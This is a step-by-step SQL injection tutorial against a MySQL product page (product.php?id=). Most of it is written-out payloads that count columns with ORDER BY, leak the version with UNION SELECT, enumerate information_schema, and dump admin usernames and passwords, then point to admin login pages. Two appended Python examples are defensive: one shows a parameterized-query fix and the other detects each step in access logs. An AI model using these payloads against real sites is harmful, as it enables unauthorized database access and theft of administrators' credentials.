SQL injection is an attack technique carried out from the client side: input supplied to the application alters the SQL command that the MySQL client application sends to the database. It is also the technique used to exploit web applications that use a database for data storage.
##########
#Step One#
##########
First we look for a page that takes a parameter in the URL, for example one found with a search dork such as product.php?id=100
Add the character "'" at the end of the URL, or add the character "-"; the purpose is to see whether the site shows an error message
example:
product.php?id=100'or
product.php?id=100-
product.php?id=100;{
product.php?id=100(
product.php?id=100(_!_)
so an error message like the following appears:
##########
#Step Two#
##########
In this step we find how many columns the vulnerable query returns (the tutorial calls them tables).
For this we use the command: order by
product.php?id=-100+order+by+1-- or
product.php?id=-100+order+by+1/*
Check it step by step, increasing the number each time
eg:
product.php?id=-100+order+by+1--
product.php?id=-100+order+by+2--
product.php?id=-100+order+by+3--
product.php?id=-100+order+by+4--
until an error appears or the page content goes missing ...
product.php?id=-100+order+by+5--
which means the count we take is 4
product.php?id=-100+order+by+4--
############
#Step Three#
############
product.php?id=-100+union+select+1,2,3,4--
Suppose the number that appears on the page is 3.
Use the command version() or @@version to check the MySQL version in use: put the command in place of the number that was displayed
product.php?id=-100+union+select+1,2,version(),4--
or
product.php?id=-100+union+select+1,2,@@version,4--
If the MySQL version is 5, from here we use the command
+from+information_schema to explore the site further.
###########
#Step Four#
###########
Here we look for the tables; to display the tables that exist on the web page use
command "table_name"
command "from information_schema.tables/*
product.php?id=-100+union+select+1,2,table_name,4+from+information_schema.tables--
Once we use these commands, several tables from the site's database will be displayed; which ones depends on the site.
Because we are looking for the site's users, we look for tables related to them, such as tbl_user, tbl_admin etc. Here there is an admin table, so let's explore that table.
###########
#Step Five#
###########
To display all the tables in the database:
group_concat(table_name) goes in place of the number that was displayed
command==> +from+information_schema.tables+where+table_schema=database()
inserted after the last digit
product.php?id=-100+union+select+1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()--
##########
#Step Six#
##########
group_concat(column_name) goes in place of the number that was displayed, followed by +from+information_schema.columns+where+table_name=0xhexa--
product.php?id=-100+union+select+1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name=0xhexa--
At this stage the table name must be converted to hexadecimal (a converter website can be used); for example the word admin becomes 61646D696E
product.php?id=-100+union+select+1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name=0x61646D696E--
############
#Step Seven#
############
To bring up what is stored in the table: concat_ws(0x3a, the columns whose contents you want displayed) goes in place of the number that was displayed, and the command +from+(the table name found earlier) is inserted after the last digit
product.php?id=-100+union+select+1,2,concat_ws(0x3a,the column contents),4+from+(the table name found)-- for example the column names that came out are id, username, password
product.php?id=-100+union+select+1,2,concat_ws(0x3a,id,username,password),4+from+admin--
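Every step above relies on the same defect: product.php pastes the id parameter straight into the SQL text. The following Python is an added example, not code from the original post, that rebuilds that defect against a constructed in-memory SQLite database beside the fix (type validation plus a bound parameter), then runs the Step Two ORDER BY count and the Step Three version probe against both handlers. SQLite's sqlite_version() stands in for MySQL's version(); the table, its rows and the function names are assumptions made for this example.

```python
import sqlite3

# Constructed in-memory stand-in for the tutorial's product database.
# The table and sample rows are made up for this example.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE product (id INTEGER, name TEXT, price REAL, stock INTEGER);
        INSERT INTO product VALUES (100, 'widget', 9.99, 5);
        INSERT INTO product VALUES (101, 'gadget', 19.99, 2);
    """)
    return conn

# The pattern the tutorial targets: the id parameter is concatenated into the
# SQL text, so everything after the number is parsed as SQL.
def vulnerable_lookup(conn, id_param):
    sql = "SELECT id, name, price, stock FROM product WHERE id=" + id_param
    return conn.execute(sql).fetchall()

# The fix: validate the type the handler expects, then bind the value as a
# parameter so the driver never treats it as SQL.
def hardened_lookup(conn, id_param):
    try:
        product_id = int(id_param)
    except ValueError:
        return []            # reject rather than fall back to string handling
    sql = "SELECT id, name, price, stock FROM product WHERE id=?"
    return conn.execute(sql, (product_id,)).fetchall()

# Step Two from the text: walk ORDER BY n until the database errors. Returns
# the column count an attacker would learn, or None when the probe yields
# nothing (the hardened handler rejects the input before the parser sees it).
def column_count_via_order_by(conn, lookup, limit=20):
    for n in range(1, limit + 1):
        try:
            lookup(conn, f"100 ORDER BY {n}--")   # '+' in the URL is a space
        except sqlite3.Error:
            return n - 1 if n > 1 else None
    return None

# Step Three from the text: the UNION payload that puts the server version
# in the third column. Returns the leaked string, or None.
def version_via_union(conn, lookup):
    rows = lookup(conn, "-100 UNION SELECT 1,2,sqlite_version(),4--")
    return rows[0][2] if rows else None

if __name__ == "__main__":
    conn = build_db()
    for name, fn in (("vulnerable", vulnerable_lookup), ("hardened", hardened_lookup)):
        print(name, "columns:", column_count_via_order_by(conn, fn),
              "version:", version_via_union(conn, fn))
```

Against the vulnerable handler the probe reports four columns and the version string; against the hardened one both return None, because a non-integer id is rejected and a valid id is bound as a value rather than spliced into the statement.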
############
#Step Eight#
############
The admin page is usually at
/admin
/admin/login.php
We can also use a tool to look for the admin page
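From the defender's side, each step of the walkthrough leaves a distinctive query string in the web server's access log. The following Python is an added example, not part of the original post, that runs one signature per step over constructed Apache-style log lines (addresses from the documentation range; paths, timestamps and sizes made up) and decodes the 0x hex literal from Step Six so the analyst can see which table name was requested. The signature names and the analyze() function are assumptions made for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines that replay the tutorial's steps against product.php.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /product.php?id=100 HTTP/1.1" 200 512
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /product.php?id=100%27or HTTP/1.1" 500 128
192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /product.php?id=-100+order+by+5-- HTTP/1.1" 500 128
192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /product.php?id=-100+union+select+1,2,@@version,4-- HTTP/1.1" 200 640
192.0.2.10 - - [01/Jan/2024:10:00:20 +0000] "GET /product.php?id=-100+union+select+1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name=0x61646D696E-- HTTP/1.1" 200 700
198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /product.php?id=101 HTTP/1.1" 200 512
"""

# Each signature corresponds to one step of the tutorial.
SIGNATURES = [
    ("quote_probe",   re.compile(r"'\s*(?:or|and)\b", re.I)),               # Step One
    ("order_by_enum", re.compile(r"\border\s+by\s+\d+", re.I)),              # Step Two
    ("union_select",  re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),   # Step Three
    ("version_probe", re.compile(r"@@version|\bversion\s*\(\s*\)", re.I)),   # Step Three
    ("schema_enum",   re.compile(r"\binformation_schema\.", re.I)),          # Steps Four to Six
    ("concat_dump",   re.compile(r"\b(?:group_concat|concat_ws)\s*\(", re.I)),  # Steps Five to Seven
]
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")
REQUEST_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')

def decode_hex_literals(query):
    """Decode 0x... literals (Step Six) back to text so the analyst sees the
    table name that was asked for; literals that are not valid ASCII are skipped."""
    names = []
    for h in HEX_LITERAL.findall(query):
        try:
            names.append(bytes.fromhex(h).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            continue
    return names

def analyze(log_text):
    """Return one finding per request whose URL-decoded query matches a signature."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_LINE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        path, _, raw_query = target.partition("?")
        query = unquote_plus(raw_query)          # '+' becomes space, %27 becomes '
        hits = [name for name, rx in SIGNATURES if rx.search(query)]
        if hits:
            findings.append({"ip": ip, "path": path, "signatures": hits,
                             "hex_names": decode_hex_literals(query)})
    return findings

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

The first and last sample requests are ordinary product lookups and produce no finding; the four in between match, in order, the quote probe, the ORDER BY walk, the UNION version check and the information_schema column dump, and the hex literal in the last one decodes to admin. Decoding the query before matching matters because the raw log still holds the '+' and %27 forms.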